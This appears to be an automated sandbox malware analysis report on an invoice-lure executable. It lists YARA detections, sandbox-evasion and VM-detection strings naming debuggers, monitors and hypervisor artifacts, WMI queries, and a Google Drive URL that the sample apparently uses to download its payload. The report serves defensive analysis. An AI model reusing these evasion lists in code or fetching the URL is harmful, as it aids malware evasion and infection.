    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6298208897.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6287398810.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6330808823.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6321698835.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6284121658.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Windows Security Disabler
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
    Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: SUPERANTISPYWARE.EXE
    Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmpBinary or memory string: PEID.EXE
    Source: MpSigStub.exe, 00000023.00000003.6283231817.0000028BD6AFE000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNS.EXE
    Source: MpSigStub.exe, 00000023.00000003.6290146708.0000028BD5FA2000.00000004.00000001.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
    Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmpBinary or memory string: API_LOG.DLL
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !E!#BM_COPYRENAMEDONAME_PROCMON.EXE
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpBinary or memory string: !#SLF:AGGR:COPYRENAMED!PROCMON.EXE
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpBinary or memory string: "G!#BM_COPYRENAMEDONAME_AUTORUNS.EXE
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpBinary or memory string: "H!#SLF:AGGR:COPYRENAMED!PROCMON.EXE
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpBinary or memory string: DBGHELP.DLLSBIEDLL.DLL
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpBinary or memory string: OLLYDBGOLLYICEPEDITORLORDPEC32ASMIMPORTREC.EXE
    Source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXE
    Source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
    Source: MpSigStub.exe, 00000023.00000003.6330388931.0000028BD6326000.00000004.00000001.sdmpBinary or memory string: &[!#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
    Source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmpBinary or memory string: $C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXE
    Source: MpSigStub.exe, 00000023.00000003.6330388931.0000028BD6326000.00000004.00000001.sdmpBinary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpBinary or memory string: !#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpBinary or memory string: PTABLE)(LAPTOP)(NOTEBOOK)(SUB NOTEBOOK)%S \%D.%D.%D.%D%04X%04XSBIEDLL.DLLDBGHELP.DLLAPI_LOG.
    Source: MpSigStub.exe, 00000023.00000003.6290146708.0000028BD5FA2000.00000004.00000001.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
    Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpBinary or memory string: BEHAVIORDUMPER.EXE
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpBinary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpBinary or memory string: REGMON.EXE
    Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLSBIEDLLX.DLLHTTP://
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpBinary or memory string: SANDBOXIEDCOMLAUNCH.EXE
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2628814510.0000000002AE0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#BM_COPYRENAMEDINAME_PROCMON.EXE
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpBinary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpBinary or memory string: \MSNSNIFFER\MSNSNIFFER.EXE]
    Source: RegAsm.exe, 0000000A.00000002.7226801339.0000000001370000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1VRYTXUZ5YWXYVS_VDIFBNUH61TX5MQ4U
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2627838947.0000000000643000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpBinary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpBinary or memory string: %Z!#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpBinary or memory string: &\MSNSNIFFER\MSNSNIFFER.EXE]
    Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpBinary or memory string: QEMU-GA.EXE
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#BM_COPYRENAMEDONAME_PROCMON.EXE
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
    Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmpBinary or memory string: !#SLF:AGGR:COPYRENAMED!AUTORUNS.EXE
    Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpBinary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNS.EXE
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpBinary or memory string: SNIFFER.EXE
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpBinary or memory string: PEBROWSEDBG.EXE
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpBinary or memory string: IFPROCESSEXISTS("SANDBOXIERPCSS.EXE")ORPROCESSEXISTS("SANDBOXIEDCOMLAUNCH.EXE")THEN
    Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXE
    Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXE
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpBinary or memory string: $Y!#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
    Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmpBinary or memory string: DIR_WATCH.DLL
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLA
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpBinary or memory string: *.LOG.|!\FABRICOBSERVER.EXE
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpBinary or memory string: #I!#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
    Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpBinary or memory string: SANDBOXIERPCSS.EXE
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: "G!#BM_COPYRENAMEDINAME_AUTORUNS.EXE
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2627838947.0000000000643000.00000004.00000020.sdmpBinary or memory string: EROGRAM FILES\QEMU-GA\QEMU-GA.EXELLP*B
    Source: MpSigStub.exe, 00000023.00000003.6269774597.0000028BC3EE4000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !E!#BM_COPYRENAMEDINAME_PROCMON.EXE
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpBinary or memory string: #I!#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2628814510.0000000002AE0000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7226801339.0000000001370000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpBinary or memory string: RC:\PROGRAM FILES\WIRESHARK\WIRESHARK.EXE
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE
    Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmpBinary or memory string: SNIFF_HIT.EXE
    Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpBinary or memory string: FAKEHTTPSERVER.EXE
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpBinary or memory string: BSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WIRESHARK.EXE
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
    Tries to detect Any.run
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exeFile opened: C:\Program Files\qga\qga.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1368Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9947
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exeDropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exeDropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavbase.vdm
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exeDropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasdlta.vdm
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exeDropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasbase.vdm
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0104EA88 sgdt fword ptr [eax]
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.AVHDX.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.toc.|!\qemu-system-armel.exe
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpBinary or memory string: 4ifprocessexists("vboxtray.exe")and$
    Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmpBinary or memory string: "/providers/microsoft.compute/virtualmachines/",
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: VMware_Virtual
    Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmpBinary or memory string: Z"/providers/microsoft.compute/virtualmachines/",
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: %ProgramData%\Microsoft\Windows\Hyper-V\*.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: z"vmware"$bisvm=trueelseif$smodel="virtualbox"
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: VBoxTrayToolWndClass
    Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmpBinary or memory string: MachineInfo isVirtualMachine
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: % *.bin.|!\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpBinary or memory string: =mQ:#LowFiDetectsVmWare
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: \\.\VBoxGuest\\.\VMDRVSYSTEM\CurrentControlSet
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpBinary or memory string: vboxhook.dll
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpBinary or memory string: vmware-tray.exe
    Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmpBinary or memory string: vmware
    Source: MpSigStub.exe, 00000023.00000003.6286232837.0000028BD6261000.00000004.00000001.sdmpBinary or memory string: ,system\currentcontrolset\services\vboxguest
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpBinary or memory string: vmusrvc
    Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmpBinary or memory string: IsVmWare
    Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmpBinary or memory string: VMWARETRAY.EXE
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Hyper-V\*.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: azurevirtualmachinename
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.RCT.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmpBinary or memory string: dynmem_detects_vmware
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.AVHD.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.bin.|!\qemu-system-i386.exe
    Source: MpSigStub.exe, 00000023.00000003.6271144612.0000028BD765F000.00000004.00000001.sdmpBinary or memory string: \vmnet.exe
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: =8*|%systemroot%\System32\Vmcompute.exe|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6309167109.0000028BD7FFE000.00000004.00000001.sdmpBinary or memory string: RPF:DetectsVmWare
    Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmpBinary or memory string: VmWarePlayer
    Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmpBinary or memory string: ifprocessexists("vboxservice.exe")thenexit
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2627838947.0000000000643000.00000004.00000020.sdmpBinary or memory string: erogram Files\Qemu-ga\qemu-ga.exellP*b
    Source: MpSigStub.exe, 00000023.00000003.6285070883.0000028BD693A000.00000004.00000001.sdmpBinary or memory string: RDC:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
    Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmpBinary or memory string: %qemu
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.HRL.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.toc.|!\qemu-system-aarch64.exe
    Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmpBinary or memory string: .VmDetector.VirtualMachineDetector
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpBinary or memory string: ,Administrator,Guest,vmware
    Source: MpSigStub.exe, 00000023.00000003.6285070883.0000028BD693A000.00000004.00000001.sdmpBinary or memory string: !#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.bin.|!\qemu-system-aarch64.exe
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpBinary or memory string: vmtools.exe
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: 83*|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.img.|!\qemu-system-aarch64.exe
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.VMCX.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.xml.|!\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpBinary or memory string: virtual hd]
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpBinary or memory string: VMware
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: &!*.txt.|!\qemu-system-aarch64.exe
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: vboxservice
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: % *.xml.|!\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmpBinary or memory string: f)a.VmDetector.VirtualMachineDetector
    Source: MpSigStub.exe, 00000023.00000003.6271144612.0000028BD765F000.00000004.00000001.sdmpBinary or memory string: unsubscribe vmnet notification
    Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmpBinary or memory string: \\.\VBoxMiniRdrDN
    Source: RegAsm.exe, 0000000A.00000002.7230551454.0000000001592000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.xml.|!\qemu-system-aarch64.exe
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: Anti Sandboxie/VMware
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2628814510.0000000002AE0000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7226801339.0000000001370000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: 83*|%systemroot%\System32\Vmms.exe|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpBinary or memory string: myapp.exeqemu
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: AntiVmWare
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpBinary or memory string: "IsInVMware":
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2627838947.0000000000643000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmpBinary or memory string: FA*.|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: % *.img.|!\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmpBinary or memory string: sandboxvmware]
    Source: RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.ISO.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmpBinary or memory string: *.|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
